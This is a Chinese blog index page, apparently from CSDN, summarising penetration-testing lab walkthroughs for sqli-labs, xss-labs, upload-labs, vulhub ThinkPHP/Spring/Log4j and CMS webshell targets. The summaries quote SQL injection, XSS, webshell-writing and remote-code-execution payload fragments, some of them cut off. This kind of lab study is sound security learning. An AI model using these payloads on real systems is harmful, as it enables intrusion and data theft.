自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(43)
  • 收藏
  • 关注

原创 aspcms webshell漏洞复现

步骤三:.在抓取的数据包中修改 slideTextStatus 字段的值为以下代码并进行发包 访问影响文件。步骤一:/admin_aspcms/login.asp访问后台,admin 123456 登录。步骤二:点击【扩展功能】【幻灯片设置】点击【保存】开启代理进行抓包。(65)))%25><%25 密码是a。

2024-09-16 14:48:52 309

原创 dedecms靶场(四种webshell姿势)

步骤一:系统-》sql命令行工具-》select '<?>'into outfile "D:/phpstudy_pro/WWW/1.php"-》确认。步骤二:点击【生成】【更新主页HTML】将主页位置修改为【./index.php】点击 【生成静态】点击 【更新主页HTML】 再次访问站点首页可发现变化。步骤一:模板-》默认模板管理-》index.htm-》修改-》添加一句话木马。步骤二:核心-》文件式管理-》文件上传-》上传一句话木马。步骤一:模块-》广告管理-》增加一个新广告。步骤二:进行蚁剑连接。

2024-09-16 13:54:20 211

原创 seafaring靶场漏洞测试攻略

alert(1)

2024-09-13 19:43:55 452

原创 sqlgun靶场攻略

步骤七:扫描目录,有一个phpinfo.php文件,访问获取绝对路径。步骤八:.写入一句话木马,访问a.php。步骤六:查看账户和密码。步骤三:查看数据库名。步骤九:进行蚁剑连接。

2024-09-13 19:21:07 511

原创 RickdiculouslyEasy-CTF-综合靶场

第一个flag:命令:nmap -A -v -T4 172.16.1.7 -p 1-65535。第四个flag:利用nc远程连接60000端口,获取到了一个shell。访问/cgi-bin/tracertool.cgi。第五个flag:访问passwords。第六个flag:访问passwords。查看页面源代码得出密码:winter。第三个flag:访问13337端口。步骤一:利用Goby搜索靶机地址。第二个flag:访问9090端口。第七个flag:ftp。步骤二:访问靶机地址。图片下载用记事本打开。

2024-09-11 16:21:23 596

原创 vulhub Thinkphp5 2-rce远程代码执行漏洞

s=/Index/index/name/${@print(eval($_POST[cmd]))}cd /vulhub/thinkphp/2-rce #进入漏洞环境所在目录。s=/Index/index/L/${@phpinfo()}步骤一: 执行以下命令启动。up -d #启动靶场。ps #查看容器信息。步骤五:进行蚁剑连接。

2024-09-08 15:05:56 283

原创 vulhub spring 远程命令执行漏洞(CVE-2016-4977)

步骤三:192.168.0.107:8080/oauth/authorize?cd /vulhub/spring/CVE-2016-4977#进入漏洞环境所在目录。复制poc生成的链接,仅替换${2*2}部分,保留后面的client_id部分。CVE-2016-4977目录中运行poc 输入生成的shell。步骤一:执行以下命令启动靶场环境并在浏览器访问。

2024-09-08 14:50:15 481

原创 vulhub ThinkPHP5 5.0.23远程代码执行漏洞

步骤五:通过echo命令写入 Webshell 文件,首先将一句话木马进行Base64 编码。步骤一:.执行以下命令启动靶场环境并在浏览器访问。步骤三:/index.php?步骤七:访问shell.php。步骤四:利用HackBar。步骤六:发送POST 请求。步骤二:访问靶机环境。步骤八:进行蚁剑连接。

2024-09-08 14:29:32 364

原创 代码执行漏洞-Log4j2漏洞

步骤七:拿取JDK1.8并构造Payload且直接访问..可以看到网页被重定向到了我们的恶意类网址...步骤四:发现 /solr/admin/cores?action= 这⾥有个参数可以传。步骤三:先在自己搭建的DNSLOG平台上获取⼀个域名来监控我们注⼊的效果。步骤一:执行以下命令启动靶场环境并在浏览器访问。反弹Shell-base64加密。步骤五:反弹shell。步骤二:访问靶机地址。

2024-09-08 14:11:58 264

原创 中间件解析漏洞

步骤二:访问靶机并上传 shell.php 文件,抓包,修改⽂件后缀为.jpg,在.jpg后⾯添加两个空格并给上 .php 后缀。在x.asp中新建⼀个.txt⽂件,内容为<%=now()%> asp代码,更改后缀为jpg。步骤三:在外部浏览器进行访问Window2003的ip/x.asp/1.jpg,得出时间。步骤三:访问靶机并上传 shell.jpg 文件,文件内容为GIF89a。进行访问:/uploadfiles/lsz.php.jpg。步骤二:访问靶机并上传 lsz.php.jpg 文件,

2024-09-05 19:02:54 691

原创 Tomato靶机通关攻略

步骤四:进入antibots->info.php->右击进入页面源代码->发现存在文件包含漏洞。步骤五:页面通过image传参查看passwd文件。步骤七:将一句话木马作为ssh登录的用户名登录。得出:/antibot_image/进行访问。步骤六:页面通过image传参查看日志文件。步骤一:进行端口扫描,找寻靶机地址。步骤三:利用dirb进行扫描。步骤二:访问靶机地址。

2024-09-04 14:54:31 605

原创 pikachu文件包含漏洞靶场

步骤三:宝塔公网上创建一个6.txt文件,里面输入<?步骤四:fileinclude目录下找到php文件。php.ini ⾥有两个重要的参数。步骤五:访问php文件,蚁剑连接。步骤一:选择一个球员提交。

2024-09-03 19:47:47 573

原创 文件包含PHP伪协议利用方法 本地复现

cmd=php://input利用burp抓包。步骤二:创建123.php文件输入一句话木马。less-3 php://input协议。php.ini ⾥有两个重要的参数。php://filter协议。创建2.txt文件进行压缩。步骤三:创建1.php。

2024-09-03 19:09:10 596

原创 hackme靶机通关攻略

步骤七:更改后缀名为.jpg进行文件上传,进型burp抓包。访问/upload/1.php后进行蚁剑连接。步骤五:在书名后进行sql漏洞注入。步骤四:输入书名进行burp抓包。查询user,pasword信息。利用superadmin进行登录。更改文件名后缀为.php进行放包。步骤六:编写1.php木马文件。步骤二:访问搜索地址。步骤三:注册账号密码。

2024-09-03 18:14:17 325

原创 sqli-labs靶场通关攻略 61-65

步骤一:闭合方式:?id=1')) --+步骤三:查出网站的数据库表名。步骤四:查出users表列名。第六一关 less-61。第六二关 less-62。第六三关 less-63。第六四关 less-64。第六五关 less-65。步骤五:获取目标信息。输入登录框,提交成功。

2024-09-02 15:32:18 386

原创 sqli-labs靶场通关攻略 56-60

步骤一:闭合方式:?id=1')-- +步骤一:闭合方式:?id=1") --+步骤三:联合查询 查出网站的数据库表名。步骤四:联合查询 查出users表列名。步骤一:闭合方式:?步骤三:联合查询 查出网站的数据库表名。步骤四:联合查询 查出users表列名。步骤一:闭合方式:?步骤一:闭合方式:?步骤三:查出网站的数据库表名。步骤四:查出users表列名。步骤三:查出网站的数据库表名。步骤四:查出users表列名。步骤三:查出网站的数据库表名。步骤四:查出users表列名。第五六关 less-56。

2024-09-02 10:46:02 732

原创 upload-labs靶场通关(附靶场环境)

步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件%00,1.php改为1.jpg 放行。步骤一:上传1.php文件抓包,将/upload/后面添加随便一个php文件加空格,1.php改为1.jpg。步骤一:图片需要二次渲染,上传图片,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址。步骤一:上传shell.jpg,图片右键新建标签页打开图片,打开文件包含漏洞,用file读取图片地址。步骤一:上传1.php文件抓包,1.php后面加.空格. 放行。

2024-09-01 11:41:40 1013

原创 sqli-labs靶场通关攻略 51-55

用ascii码截取数据库的第一位字符 判断第一位字符的ascii码是否大于114 页面延迟三秒访问 说明数据库第一位字符ascii码大于114。sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)步骤三:联合查询 查出网站的数据库表名。步骤三:联合查询 查出网站的数据库表名。步骤一:利用时间盲注查询数据库。

2024-08-30 16:04:23 1097

原创 sqli-labs靶场通关攻略 46-50

判断数据库第一位字符的ascii码是否大于115 页面正常显示 说明不大于 大于114不大于115 说明第一位字符ascii码等于115。sort=1' and if((ascii(substr(database(),1,1))>115),sleep(3),1)--+sort=1 and if((ascii(substr(database(),1,1))>115),sleep(3),1)步骤一:利用时间盲注查询数据库。步骤一:利用报错注入查询库。步骤一:利用报错注入查询库。步骤一:利用报错注入查询库。

2024-08-29 18:58:08 1650

原创 vulhub xxe靶机

步骤六:进入/xxe/admin.php输入用户名:administhebest 密码:admin@123。步骤五:输入用户名密码,利用burp抓包,传送至重放器。步骤二:利用dirsearsh扫描目录。步骤八:在www目录下添加php文件。进行base64解码有用户名密码。得出Flag进行base32解码。得出结果进行base64解码。访问本机php文件,得出结果。进入robots.txt。步骤一:搜索靶机地址。步骤四:访问/xxe。进行base64解码。进行base64解码。

2024-08-29 18:00:29 1166

原创 sqli-labs靶场通关攻略 41-45

密码框输入:') and updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database() ),0x7e),1) -- aaa。密码框输入:') and updatexml(1,concat(0x7e,(select database()),0x7e),1) -- aaa。步骤四:查看users表列名。步骤四:查看users表列名。

2024-08-28 19:03:36 1263

原创 xss-labs通关攻略 16-20关

keyword=<img%0asrc="1.jpg"%0aonerror=alert(1)>19-20关需要flash插件,本文章就不描述了,想做请去访问大佬文章。第十六关:less-16。第十七关:less-17。第十八关:less-18。第十九关:less-19。第二十关:less-20。

2024-08-28 17:58:58 156

原创 ctfhub-web-SSRF(FastCGI协议-DNS重绑定 Bypass)

步骤二:对一句话木马进行base64编码:<?输入:url=http://0x7f000001/flag.php。访问url=http://127.0.0.1/flag.php。访问url=http://127.0.0.1/flag.php。访问url=http://127.0.0.1/flag.php。less-6 FastCGI协议。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。步骤一:开启环境,查看提示。

2024-08-28 14:46:30 815

原创 xss-labs通关攻略 11-15关

步骤二:修改User Agent:click me!" type="button" onmouseover="alert(/xss/)进行放包。步骤二:修改Cookie: user=click me!" type="button" onmouseover="alert(/xss/)" type="button" onmouseover="alert(/xss/)进行放包。name='步骤一:利用burp抓包。步骤一:利用burp抓包。

2024-08-27 19:03:41 525

原创 sqli-labs靶场通关攻略 36-40

主页有通关攻略 1-35第三六关 less-36宽字节注入步骤一:闭合方式?步骤二:查看数据库名步骤三:查看表名步骤四:查看users表中列名步骤五:查看信息第三七关 less-37步骤一:输入Username:admin Password:admin 利用Burp抓包步骤二:查看数据库步骤三:查看表名步骤四:查看users表中列名步骤五:查看users表中信息第三八关 less-38步骤一:闭合方式?id=1' --+步骤二:查询数据库?步骤三:查看表名?

2024-08-27 18:09:20 1098

原创 ctfhub-web-SSRF(内网访问-上传文件)

步骤六:新建文本文档,将其中的 %0A 替换成 %0d%0A 并且末尾要加上 %0d%0a。步骤二:输入url=file:///var/www/html/flag.php。步骤二:输入url=http://127.0.0.1:8000进行抓包。步骤二:输入url=http://127.0.0.1/flag.php。步骤二:输入url=http://127.0.0.1/flag.php。将其中的 %0A 替换成 %0d%0A 并且末尾要加上 %0d%0a。步骤一:开启环境,查看提示。

2024-08-27 16:32:50 741

原创 sqli-labs靶场通关攻略 31-35

步骤一:输入Username:admin Password:admin 利用Burp抓包。步骤一:查询闭合方式?id=1%df' --+步骤一:查询闭合方式?id=1%df' --+id=1&id=1 ") --+步骤四:查看users表中列名。步骤四:查看users表中列名。步骤三:查看users表中列名。步骤四:查询users表中列名。步骤五:查看users表中信息。步骤三:查询users表中列名。第三三关 less-33。步骤二:查看数据库名。步骤一:查看数据库名。步骤二:查看数据库名。

2024-08-26 19:23:45 1176

原创 xss-labs通关攻略 6-10关

<a href=javascript:alert()> j链接不合法。步骤一:" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> j。步骤二:大小写绕过"> <sCript>alert()</sCript> <"步骤一:输入 <script>alert(1)</script>步骤一:输入 <script>alert(1)

2024-08-26 18:45:47 332

原创 sqli-labs靶场通关攻略 26-30

主页有通关攻略 1-25第二六关 less-26步骤一:输入?id=1 发现逻辑运算符,注释符以及空格给过滤了步骤二:?id=1 and'闭合,转换:逻辑运算符使用双写或者&&和||替换,空格用括号替换步骤三:查询数据库名步骤四:查看表名步骤五:查看users表中的列名步骤六:查看信息第二七关 less-27步骤一:过滤了空格,select和union大小写绕过,%09代替空格查数据库步骤二:查看表名步骤三:查看users表中列名。

2024-08-25 14:22:54 1046

原创 xss-labs通关攻略 1-5关(附靶场环境)

alert(1)</script> 没有结果。步骤三:闭合">然后输入"><script>alert(1)</script>步骤一:输入<script>alert(1)</script>步骤一:输入<script>alert(1)</script>步骤一:输入<script>alert(1)</script>步骤一:输入<script>alert(1)</script>步骤一:输入<script>alert(1)

2024-08-25 13:43:20 502

原创 pikachu靶场XXS通关攻略

alert(1)</script>没有弹窗,点击F12进行查看。<script>alert(1)</script>,F12打开控制台。输入'<script>alert(1)</script>没有弹窗。输入'<sCript>alert(1)</sCript>输入<script>alert(1)</script>输入<script>alert(1)</script>输入<script>alert(1)</script>输入<script>alert(1)

2024-08-22 19:56:11 313

原创 sqli-labs靶场通关攻略 21-25

代码:') union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' #代码:') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #

2024-08-22 19:08:10 1142

原创 sqli-labs靶场通关攻略 16-20

步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater。步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater。步骤一:利用Burp Suite抓包 username:admin password:admin抓到数据发送打Repeater。步骤一:判断闭合方式为admin") and 1=1#步骤二:在passwd=admin后输入'报错。

2024-08-21 19:43:14 868

原创 墨者学院-PostGREsql⼿⼯注⼊

id=1 and 1=2 --+数据报错 则为数字型。id=1 and 1=1 --+数据没有报错。步骤三: 通过order by来判断字段数。步骤九:利用md5解密进行登录。步骤一:找寻注入sql页面。步骤五:查询所有数据库。步骤七:查询user表。步骤二:判断注入方式。

2024-08-20 19:17:46 283

原创 墨者学院-MongoDB⼿⼯注⼊

墨者学院-MongoDB⼿⼯注⼊

2024-08-20 18:47:31 223

原创 墨者学院-Oracle⼿⼯注⼊

墨者学院-Oracle⼿⼯注⼊

2024-08-20 17:44:56 243

原创 MSSQL SQLi Labs 手工注入靶场

less-1步骤一:判断注入方式 ?id=1' --+步骤二:判断后台是否是MYSQL数据库?id=1' and exists(select * from sysobjects) --+步骤三:查询数据库信息,user回显的dbo表示是最⾼权限,如果是⽤户的名字表示是普通权限?id=-1' union select 1,user,is_srvrolemember('public'); --+步骤四:查询表名第一张表:?id=-1'and (select top 1 cast (name as varchar

2024-08-20 17:03:15 857

原创 Access手工注入靶场(附环境搭建)

Access手工注入靶场(附环境搭建)

2024-08-20 13:48:43 575

原创 sqli-labs靶场通关攻略 11-15

sqli-labs靶场通关攻略 11-15

2024-08-19 20:38:55 717

原创 AI-Web 靶机通关略

AI-Web 靶机通关略

2024-08-19 18:34:10 414

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除